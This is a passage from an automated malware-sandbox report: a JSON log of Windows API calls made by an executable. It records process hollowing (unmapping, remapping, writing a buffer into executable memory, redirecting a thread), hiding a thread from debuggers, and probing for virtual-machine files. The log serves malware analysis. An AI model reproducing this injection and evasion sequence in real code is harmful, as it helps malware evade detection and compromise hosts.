}, { "name": "ProcessId", "value": "3552" }, { "name": "ThreadId", "value": "2840" }, { "name": "ProcessHandle", "value": "0x00000388" }, { "name": "ThreadHandle", "value": "0x00000384" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1153 }, { "timestamp": "2025-02-27 23:34:18,066", "thread_id": "3892", "caller": "0x0241cf9e", "parentcaller": "0x0041224a", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "9224" } ], "repeated": 0, "id": 1154 }, { "timestamp": "2025-02-27 23:34:18,066", "thread_id": "3892", "caller": "0x0241d45a", "parentcaller": "0x0041224a", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0x00000388" }, { "name": "BaseAddress", "value": "0x00400000" }, { "name": "RegionSize", "value": "0x00001000" } ], "repeated": 0, "id": 1155 }, { "timestamp": "2025-02-27 23:34:18,066", "thread_id": "3892", "caller": "0x0241cf9e", "parentcaller": "0x0041224a", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "9224" } ], "repeated": 0, "id": 1156 }, { "timestamp": "2025-02-27 23:34:18,066", "thread_id": "3892", "caller": "0x0241d45a", "parentcaller": "0x0041224a", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000390" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "FILE_READ_ACCESS" }, { "name": "FileName", "value": "C:\\Windows\\SysWOW64\\msvbvm60.dll" }, { "name": "ShareAccess", "value": "1", "pretty_value": "FILE_SHARE_READ" } ], "repeated": 0, "id": 1157 }, { "timestamp": "2025-02-27 23:34:18,066", "thread_id": "3892", "caller": "0x0241cf9e", "parentcaller": "0x0041224a", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "9224" } ], "repeated": 0, "id": 1158 }, { "timestamp": "2025-02-27 23:34:18,066", "thread_id": "3892", "caller": "0x0241d45a", "parentcaller": "0x0041224a", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x0000038c" }, { "name": "DesiredAccess", "value": "0x000f001f", "pretty_value": "SECTION_ALL_ACCESS" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x00000390" } ], "repeated": 0, "id": 1159 }, { "timestamp": "2025-02-27 23:34:18,066", "thread_id": "3892", "caller": "0x0241cf9e", "parentcaller": "0x0041224a", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "9224" } ], "repeated": 0, "id": 1160 }, { "timestamp": "2025-02-27 23:34:18,066", "thread_id": "3892", "caller": "0x0241d45a", "parentcaller": "0x0041224a", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x40000003", "arguments": [ { "name": "SectionHandle", "value": "0x0000038c" }, { "name": "ProcessHandle", "value": "0x00000388" }, { "name": "BaseAddress", "value": "0x00400000" }, { "name": "ModuleName", "value": "f1ffd3c13b7bd7f498e8.exe" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x0015d000" }, { "name": "Win32Protect", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1161 }, { "timestamp": "2025-02-27 23:34:18,081", "thread_id": "3892", "caller": "0x024153ff", "parentcaller": "0x0041224a", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0x00000388" }, { "name": "BaseAddress", "value": "0x00560000" }, { "name": "RegionSize", "value": "0x00100000" }, { "name": "Protection", "value": "0x00000040", "pretty_value": "PAGE_EXECUTE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1162 }, { "timestamp": "2025-02-27 23:34:18,081", "thread_id": "3892", "caller": "0x024154ea", "parentcaller": "0x0041224a", "category": "process", "api": "NtWriteVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0x00000388" }, { "name": "BaseAddress", "value": "0x00560000" }, { "name": "Buffer", "value": "\\xe90\\x01\\x00\\x00\\xebD\\x0e$0D\\x02x`H^(l\\x14\\x0e$0D\\x02x`H^(l\\x14\\x0e$0D\\x02x`H^(l\\x14\\x0e$0D\\x02x`H^(l\\x14\\x0e$0D\\x02x`H^(l\\x14\\x0e$0D\\x02x`H\\xf6\\xc7\\xc5]/t\\xa6RP\\x11\\xceT\\xc2\\xc2F\\xebA\\xfb\\x0f\\x8fTH*\\x84u\\xe5Q\\xca\\xe7\\xd4\r\\x1df\\xcf\\xd7\\x056\\x1c\\xad\\xfaW\\xba\\x18\\xfc\\xc8d\\x91\\x93\\x8b\\xa4Z7[\\xf00,|\\x8e\\x9cs\\xee8\\x14\\xc6lx\\xddj\\x80\\xc5\\xf7_\\xa1b\\x1f\\xa5\\x13\r\\x97<\\x92L`\\xe0a\\x99{\\xd5\\xc66\\xa2\\x1b\\xf4\\xe1\\x1an\\xb7 \\xe4\\x12\\x87m\\xfe\\x07\\xa8\\x0b%M\\x19\\xb5\\xe2\\xe4\\xdc\\xf5g\\x88\\xebP0D\\x02x`H^(l\\x14\\x0e$0D\\x02x`H^(l\\x14\\x0e$0D\\x02x`H^(l\\x14\\x0e$0D\\x02x`H^(l\\x14\\x0e$0D\\x02x`H^(l\\x14\\x0e$0D\\x02" }, { "name": "BufferLength", "value": "0x0000f000" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1163 }, { "timestamp": "2025-02-27 23:34:18,081", "thread_id": "3892", "caller": "0x024154ea", "parentcaller": "0x0041224a", "category": "system", "api": "GetSystemTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 1164 }, { "timestamp": "2025-02-27 23:34:18,097", "thread_id": "3892", "caller": "0x0241cf9e", "parentcaller": "0x0041224a", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "9224" } ], "repeated": 0, "id": 1165 }, { "timestamp": "2025-02-27 23:34:18,097", "thread_id": "3892", "caller": "0x0241d45a", "parentcaller": "0x0041224a", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0x00000384" }, { "name": "HollowedInstructionPointer", "value": "0x004011c4" }, { "name": "CurrentInstructionPointer", "value": "0x771c57c0" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 1166 }, { "timestamp": "2025-02-27 23:34:18,097", "thread_id": "3892", "caller": "0x0241cf9e", "parentcaller": "0x0041224a", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "9224" } ], "repeated": 0, "id": 1167 }, { "timestamp": "2025-02-27 23:34:18,097", "thread_id": "3892", "caller": "0x0241d45a", "parentcaller": "0x0041224a", "category": "threading", "api": "NtSetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0x00000384" }, { "name": "HollowedInstructionPointer", "value": "0x004011c4" }, { "name": "CurrentInstructionPointer", "value": "0x00560000" }, { "name": "Flags", "value": "0x00010007" } ], "repeated": 0, "id": 1168 }, { "timestamp": "2025-02-27 23:34:18,112", "thread_id": "3892", "caller": "0x0241cf9e", "parentcaller": "0x0041224a", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "9224" } ], "repeated": 0, "id": 1169 }, { "timestamp": "2025-02-27 23:34:18,112", "thread_id": "3892", "caller": "0x0241d45a", "parentcaller": "0x0041224a", "category": "threading", "api": "NtResumeThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0x00000384" }, { "name": "SuspendCount", "value": "1" }, { "name": "ThreadId", "value": "2840" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 1170 }, { "timestamp": "2025-02-27 23:34:18,112", "thread_id": "3892", "caller": "0x02415a08", "parentcaller": "0x0041224a", "category": "process", "api": "NtTerminateProcess", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "ExitCode", "value": "0x00000000" } ], "repeated": 0, "id": 1171 } ], "threads": [ "3892", "6000", "11256" ], "environ": { "UserName": "admin", "ComputerName": "DESKTOP-JQK72EN", "WindowsPath": "C:\\Windows", "TempPath": "C:\\Users\\pacop\\AppData\\Local\\Temp\\", "CommandLine": "\"C:\\Users\\pacop\\AppData\\Local\\Temp\\f1ffd3c13b7bd7f498e8.exe\" ", "RegisteredOwner": "", "RegisteredOrganization": "", "ProductName": "", "SystemVolumeSerialNumber": "e4dd-cd2a", "SystemVolumeGUID": "16132ca6-0000-0000-0000-300300000000", "MachineGUID": "", "MainExeBase": "0x00400000", "MainExeSize": "0x00017000", "Bitness": "32-bit" }, "file_activities": { "read_files": [], "write_files": [], "delete_files": [] } }, { "process_id": 3552, "process_name": "f1ffd3c13b7bd7f498e8.exe", "parent_id": 9224, "module_path": "C:\\Users\\pacop\\AppData\\Local\\Temp\\f1ffd3c13b7bd7f498e8.exe", "first_seen": "2025-02-27 23:34:18,519", "calls": [ { "timestamp": "2025-02-27 23:34:19,441", "thread_id": "2840", "caller": "0x771b6c26", "parentcaller": "0x771b6b31", "category": "threading", "api": "NtTestAlert", "status": true, "return": "0x00000000", "arguments": [], "repeated": 4, "id": 0 }, { "timestamp": "2025-02-27 23:34:19,534", "thread_id": "2840", "caller": "0x771b6b49", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 1 }, { "timestamp": "2025-02-27 23:34:20,331", "thread_id": "2840", "caller": "0x771c5716", "parentcaller": "0x77150000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 2 }, { "timestamp": "2025-02-27 23:34:20,362", "thread_id": "2840", "caller": "0x0056c3da", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x77151000" }, { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00120000" }, { "name": "MemoryType", "value": "0x01000000" }, { "name": "NewAccessProtection", "value": "0x00000040", "pretty_value": "PAGE_EXECUTE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000040", "pretty_value": "PAGE_EXECUTE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 3 }, { "timestamp": "2025-02-27 23:34:20,394", "thread_id": "2840", "caller": "0x0056c3da", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x77151000" }, { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00120000" }, { "name": "MemoryType", "value": "0x01000000" }, { "name": "NewAccessProtection", "value": "0x00000020", "pretty_value": "PAGE_EXECUTE_READ" }, { "name": "OldAccessProtection", "value": "0x00000020", "pretty_value": "PAGE_EXECUTE_READ" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 4 }, { "timestamp": "2025-02-27 23:34:20,394", "thread_id": "2840", "caller": "0x00560e79", "parentcaller": "0x00000000", "category": "threading", "api": "NtSetInformationThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "ThreadInformationClass", "value": "17", "pretty_value": "ThreadHideFromDebugger" }, { "name": "ThreadId", "value": "2840" } ], "repeated": 0, "id": 5 }, { "timestamp": "2025-02-27 23:34:20,394", "thread_id": "2840", "caller": "0x0056628f", "parentcaller": "0x00000000", "category": "filesystem", "api": "NtCreateFile", "status": false, "return": "0xffffffffc000003a", "pretty_return": "OBJECT_PATH_NOT_FOUND", "arguments": [ { "name": "FileHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x80100080", "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Program Files\\Qemu-ga\\qemu-ga.exe" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "1", "pretty_value": "FILE_SHARE_READ" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "no" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 6 }, { "timestamp": "2025-02-27 23:34:20,394", "thread_id": "2840", "caller": "0x0056628f", "parentcaller": "0x00000000", "category": "filesystem", "api": "NtCreateFile", "status": false, "return": "0xffffffffc000003a", "pretty_return": "OBJECT_PATH_NOT_FOUND", "arguments": [ { "name": "FileHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x80100080", "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Program Files\\qga\\qga.exe" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "1", "pretty_value": "FILE_SHARE_READ" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "no" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 7 }, { "timestamp": "2025-02-27 23:34:20,394", "thread_id": "2840", "caller": "0x00560f81", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x10410000" }, { "name": "RegionSize", "value": "0x1b102000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 8 }, { "timestamp": "2025-02-27 23:34:20,409", "thread_id": "2840", "caller": "0x00569d48", "parentcaller": "0x00000000", "category": "__notification__", "api": "sysenter", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadIdentifier", "value": "2840" }, { "name": "Module", "value": "KERNEL32.DLL" }, { "name": "Return Address", "value": "0x7588274c" } ], "repeated": 0, "id": 9 }, { "timestamp": "2025-02-27 23:34:20,503", "thread_id": "2840", "caller": "0x00569d48", "parentcaller": "0x00000000", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\System32\\SHELL32" }, { "name": "DllBase", "value": "0x75c40000" } ], "repeated": 0, "id": 10 }, { "timestamp": "2025-02-27 23:34:20,503", "thread_id": "2840", "caller": "0x00569d48", "parentcaller": "0x00000000", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\Msi" }, { "name": "DllBase", "value": "0x72f40000" } ], "repeated": 0, "id": 11 }, { "timestamp": "2025-02-27 23:34:21,144", "thread_id": "2840", "caller": "0x00569d48", "parentcaller": "0x00000000", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "Msi.dll" }, { "name": "BaseAddress", "value": "0x72f40000" } ], "repeated": 1, "id": 12 }, { "timestamp": "2025-02-27 23:34:21,175", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x00000008" }, { "name": "TokenHandle", "value": "0x00000234" } ], "repeated": 0, "id": 13 }, { "timestamp": "2025-02-27 23:34:21,175", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\xf8\\xfc\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\x04\\xa04s\\xff\\xff\\xff\\xff\\x90cKs\\x0b\\xac\\xb6\\xa7\\xfe\\xff\\xff\\xff\\x80\\xfd\\x19\\x00\\xe6\\xb57s\\x1e\\x00\\x00\\x00\\xbc\\x9aUs\\xdc\\xb5Us\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 14 }, { "timestamp": "2025-02-27 23:34:21,206", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000234" } ], "repeated": 0, "id": 15 }, { "timestamp": "2025-02-27 23:34:21,284", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "misc", "api": "GetSystemInfo", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 16 }, { "timestamp": "2025-02-27 23:34:21,284", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "system", "api": "NtQueryLicenseValue", "status": true, "return": "0x00000000", "arguments": [ { "name": "Name", "value": "TerminalServices-RemoteConnectionManager-AllowAppServerMode" }, { "name": "Type", "value": "0x00000004" } ], "repeated": 0, "id": 17 }, { "timestamp": "2025-02-27 23:34:21,284", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 18 }, { "timestamp": "2025-02-27 23:34:21,284", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetNativeSystemInfo" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75882150" } ], "repeated": 0, "id": 19 }, { "timestamp": "2025-02-27 23:34:21,316", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Policies\\Microsoft\\Windows\\Installer" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\Installer" } ], "repeated": 1, "id": 20 }, { "timestamp": "2025-02-27 23:34:21,472", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000234" } ], "repeated": 0, "id": 21 }, { "timestamp": "2025-02-27 23:34:21,472", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x80\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xe0\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\xe7\\xf3\\x19\\x00\"\r\\x08s\\x04\\xf4\\x19\\x00\\xf8\\xf3\\x19\\x00H\\x00\\x00\\x00\\x9c\\x023\\x02\\x86J\\xb1\\xc4" } ], "repeated": 0, "id": 22 }, { "timestamp": "2025-02-27 23:34:21,472", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000234" } ], "repeated": 0, "id": 23 }, { "timestamp": "2025-02-27 23:34:21,472", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" } ], "repeated": 0, "id": 24 }, { "timestamp": "2025-02-27 23:34:21,472", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000234" } ], "repeated": 0, "id": 25 }, { "timestamp": "2025-02-27 23:34:21,472", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x80\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xe0\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\xe7\\xf3\\x19\\x00\"\r\\x08s\\x04\\xf4\\x19\\x00\\xf8\\xf3\\x19\\x00H\\x00\\x00\\x000\\xfb\\x19\\x00\\xcc\\xbeUs" } ], "repeated": 0, "id": 26 }, { "timestamp": "2025-02-27 23:34:21,472", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000234" } ], "repeated": 0, "id": 27 }, { "timestamp": "2025-02-27 23:34:21,472", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000003", "pretty_value": "HKEY_USERS" }, { "name": "SubKey", "value": "S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" }, { "name": "Handle", "value": "0x00000238" }, { "name": "FullName", "value": "HKEY_USERS\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Software\\Microsoft\\Installer\\Products" } ], "repeated": 0, "id": 28 }, { "timestamp": "2025-02-27 23:34:21,472", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegEnumKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" }, { "name": "Index", "value": "0" }, { "name": "Name", "value": "2CD228B8B2E4A1742BC626947A22DD9B" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Installer\\Products\\2CD228B8B2E4A1742BC626947A22DD9B" } ], "repeated": 0, "id": 29 }, { "timestamp": "2025-02-27 23:34:21,472", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x0000023c" } ], "repeated": 0, "id": 30 }, { "timestamp": "2025-02-27 23:34:21,472", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x80\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xe0\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\xe7\\xf3\\x19\\x00\"\r\\x08s\\x04\\xf4\\x19\\x00\\xf8\\xf3\\x19\\x00H\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 31 }, { "timestamp": "2025-02-27 23:34:21,472", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000023c" } ], "repeated": 0, "id": 32 }, { "timestamp": "2025-02-27 23:34:21,472", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-2901619373-3413834416-3107304870-1001\\Installer\\Products" } ], "repeated": 0, "id": 33 }, { "timestamp": "2025-02-27 23:34:21,472", "thread_id": "2840", "caller": "0x00561144", "parentcaller": "0x00000000", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 34 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x0000000c" }, { "name": "TokenHandle", "value": "0x00000238" } ], "repeated": 0, "id": 35 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "`\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\xff\\xff\\xff\\xff\\x0c\\x00\\x00\\x00\\xc0\\xe1\\x19\\x00\\x00\\x00\\x00\\x00\\xc7\\xe1\\x19\\x00\"\r\\x08s\\xe4\\xe1\\x19\\x00\\xd8\\xe1\\x19\\x00H\\x00\\x00\\x00\\x00\\x00\\x00\\x00N^\\xb1\\xc4" } ], "repeated": 0, "id": 36 }, { "timestamp": "2025-02-27 23:34:21,519", "thread_id": "2840", "caller": "0x005611ed", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000238" } ], "repeated": 0, "id": 37 }, { "timestamp": "2025-02-27 